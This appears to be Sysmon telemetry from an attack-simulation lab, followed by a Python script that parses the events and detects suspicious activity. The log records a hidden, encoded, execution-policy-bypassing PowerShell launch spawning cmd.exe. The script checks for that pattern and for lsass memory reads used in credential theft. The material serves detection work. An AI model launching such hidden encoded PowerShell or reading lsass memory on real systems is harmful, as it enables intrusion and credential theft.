13:21:02.623{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.586{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.586{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.586{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.586{B81B27B7-A1BE-6140-A156-04000000C801}62847088C:\Windows\system32\cmd.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.587{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe [System.Environment]::UserNameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe [System.Environment]::UserName 10341000x800000000000000036498190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000036498189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.571{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.571{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f1
65abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816
e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.579{B81B27B7-A1BE-6140-A156-04000000C801}6284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe [System.Environment]::UserNameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e 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 23542300x800000000000000036498182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36A22D2344815369EC774D407F26C6E5,SHA256=2F4A44EEE679D61A92B74C5C30C050C6D081085E72D6AF4E34E50364EAB180FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8359D885815F872A0C94E9EE4240CB55,SHA256=C1DAC4CADF4EDF7DC4091F8C928644F760074578E579A21F3BDDB58A693838C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B65FBA0EFC1CB423383A24A75D023ECE,SHA256=45BA36FD420A83F865E8DB03515D73D1C9E880FD27C431B31FC7C0F509FF0FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A065C2E7AD022C08A19A8202CAD26B,SHA256=E7DED73D5305F3FB7CFEEBAC3C2BB59D86BF25F62ED3F7402A37D6BD81B93EC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=026C1B664A94066E155A9EF8CED17C4A,SHA256=8A7F0F0B62A9C4086FC068A10F72D5D6EC7AD883A0665D9213CE332E48BA9B43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
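The records above are Sysmon XML events (event 23 FileDelete, 3 NetworkConnect, 10 ProcessAccess, 1 ProcessCreate, 17 PipeEvent, 11 FileCreate) with their field delimiters stripped. Read with the Sysmon field order in mind, the interesting part of the window is the process-create pair at 13:21:02: a powershell.exe (PID 6940) launched as `powershell -exec bypass -Noninteractive -windowstyle hidden -e ...` spawns `cmd.exe /c powershell.exe [System.Environment]::UserName` (PID 6284), which spawns a second powershell.exe (PID 6224), all as ATTACKRANGE\REED_SCHMIDT at Medium integrity; PID 6940 also keeps opening TLS connections to 10.0.1.16:443. The many event-10 records are the usual noise around a new process: in the ones that name lsass.exe, lsass.exe is the *SourceImage* (its call trace runs through lsasrv.dll and SspiSrv.dll, i.e. lsass opening an RPC caller with 0x1000/0x1478), not a process reading lsass memory. The block below is an added example, not part of this page nor of Sysmon or Splunk: it parses Sysmon-style XML events, decodes GrantedAccess masks, flags encoded/hidden/bypass PowerShell launches even when the launcher's own event 1 lies outside the window (as PID 6940's does here), checks lsass.exe access in the correct direction, and rebuilds the process lineage. The sample events are constructed to mirror the page's values; the GUIDs are shortened placeholders, the encoded payload is replaced by `BASE64_OMITTED`, the expected-source allowlist is an assumption to tune per environment, and the final powershell.exe-to-lsass.exe event is a constructed counter-example that does not occur on the page.

```python
# Added example (not from the page, Sysmon or Splunk): triage of Sysmon event 1 / event 10
# records. SAMPLE_EVENTS are constructed to mirror the page's values; see the comments.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Subset of the PROCESS_* access rights (winnt.h) needed to decode GrantedAccess.
PROCESS_RIGHTS = [(0x0002, "CREATE_THREAD"), (0x0008, "VM_OPERATION"), (0x0010, "VM_READ"),
                  (0x0020, "VM_WRITE"), (0x0040, "DUP_HANDLE"), (0x0400, "QUERY_INFORMATION"),
                  (0x1000, "QUERY_LIMITED_INFORMATION")]
MEMORY_RIGHTS = 0x0008 | 0x0010 | 0x0020  # VM_OPERATION | VM_READ | VM_WRITE
# Images expected to open lsass.exe on a stock host; an assumption to tune per environment.
LSASS_EXPECTED_SOURCES = {"svchost.exe", "csrss.exe", "wininit.exe", "msmpeng.exe"}

def decode_access(mask):
    """'0x1478' -> ['VM_OPERATION', 'VM_READ', 'VM_WRITE', 'DUP_HANDLE', ...]."""
    return [name for bit, name in PROCESS_RIGHTS if int(mask, 16) & bit]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def sysmon_xml(event_id, **data):
    """Minimal Sysmon-style <Event> string; used only to build the constructed samples."""
    body = "".join(f'<Data Name="{k}">{escape(str(v))}</Data>' for k, v in data.items())
    return f"<Event><System><EventID>{event_id}</EventID></System><EventData>{body}</EventData></Event>"

def parse_event(xml_text):
    """Flatten one event into {'EventID': int, <Data Name>: text, ...}."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": int(root.findtext("System/EventID"))}
    for d in root.iter("Data"):
        ev[d.get("Name")] = d.text or ""
    return ev

def powershell_flags(cmdline):
    """Subset of {'encoded', 'hidden', 'bypass'} on a command line. powershell.exe accepts any
    unambiguous prefix of a parameter (-e, -ec, -enc == -EncodedCommand), so match prefixes."""
    toks, flags = cmdline.lower().split(), set()
    for i, tok in enumerate(toks):
        if not tok.startswith("-") or len(tok) < 2:
            continue
        name, nxt = tok[1:], (toks[i + 1] if i + 1 < len(toks) else "")
        if "encodedcommand".startswith(name):
            flags.add("encoded")
        elif "windowstyle".startswith(name) and nxt == "hidden":
            flags.add("hidden")
        elif ("executionpolicy".startswith(name) or name == "ep") and nxt == "bypass":
            flags.add("bypass")
    return flags

def triage_process_create(ev):
    """Encoded + (hidden or bypass) PowerShell on the process's own CommandLine or on
    ParentCommandLine, so a launcher whose own event 1 is outside the window still shows."""
    hits = []
    for field in ("CommandLine", "ParentCommandLine"):
        flags = powershell_flags(ev.get(field, ""))
        if "encoded" in flags and flags & {"hidden", "bypass"}:
            hits.append((field, sorted(flags)))
    return hits

def triage_process_access(ev):
    """Memory rights on lsass.exe from an unexpected SourceImage. Direction matters: the page's
    records have lsass.exe as the *source* (lsasrv.dll/SspiSrv.dll in the call trace), which
    is lsass opening an RPC caller and must not fire."""
    if basename(ev["TargetImage"]) != "lsass.exe":
        return None
    src = basename(ev["SourceImage"])
    if src in LSASS_EXPECTED_SOURCES or not int(ev["GrantedAccess"], 16) & MEMORY_RIGHTS:
        return None
    return src, decode_access(ev["GrantedAccess"])

def lineage(events, guid):
    """Walk ParentProcessGuid through the event-1 records on hand; when the parent's own
    record is missing (PID 6940 on the page), fall back to the child's ParentImage field."""
    creates = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    chain, ev = [], creates[guid]
    while ev["ParentProcessGuid"] in creates:
        chain.append(basename(ev["Image"]))
        ev = creates[ev["ParentProcessGuid"]]
    return chain + [basename(ev["Image"]), basename(ev["ParentImage"]) + " (no record in window)"]

def triage(events):
    """One (rule, pid, detail) tuple per finding."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            for field, flags in triage_process_create(ev):
                alerts.append(("suspicious_powershell_launch", int(ev["ProcessId"]), f"{field}: {'+'.join(flags)}"))
        elif ev["EventID"] == 10 and (hit := triage_process_access(ev)):
            alerts.append(("lsass_memory_access", int(ev["SourceProcessId"]), f"{hit[0]}: {'|'.join(hit[1])}"))
    return alerts

PS, CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe"
LSASS, USER = r"C:\Windows\system32\lsass.exe", r"ATTACKRANGE\REED_SCHMIDT"
CMDLINE = r'"C:\Windows\system32\cmd.exe" /c powershell.exe [System.Environment]::UserName'
SAMPLE_EVENTS = [parse_event(x) for x in (
    # page 13:21:02.579: cmd.exe (6284) created by the encoded, hidden PowerShell (6940)
    sysmon_xml(1, ProcessGuid="g6284", ProcessId=6284, Image=CMD, CommandLine=CMDLINE, User=USER,
               IntegrityLevel="Medium", ParentProcessGuid="g6940", ParentProcessId=6940, ParentImage=PS,
               ParentCommandLine="powershell -exec bypass -Noninteractive -windowstyle hidden -e BASE64_OMITTED"),
    # page 13:21:02.587: powershell.exe (6224) created by that cmd.exe
    sysmon_xml(1, ProcessGuid="g6224", ProcessId=6224, Image=PS, User=USER, IntegrityLevel="Medium",
               CommandLine="powershell.exe [System.Environment]::UserName",
               ParentProcessGuid="g6284", ParentProcessId=6284, ParentImage=CMD, ParentCommandLine=CMDLINE),
    # page 13:21:02.739: lsass.exe (636) opens the new powershell.exe during an SSPI RPC call
    sysmon_xml(10, SourceProcessId=636, SourceImage=LSASS, TargetProcessId=6224, TargetImage=PS,
               GrantedAccess="0x1478", CallTrace=r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07"),
    # constructed counter-example, NOT on the page: powershell.exe reading lsass memory
    sysmon_xml(10, SourceProcessId=6224, SourceImage=PS, TargetProcessId=636, TargetImage=LSASS,
               GrantedAccess="0x1010", CallTrace="constructed"),
)]
```

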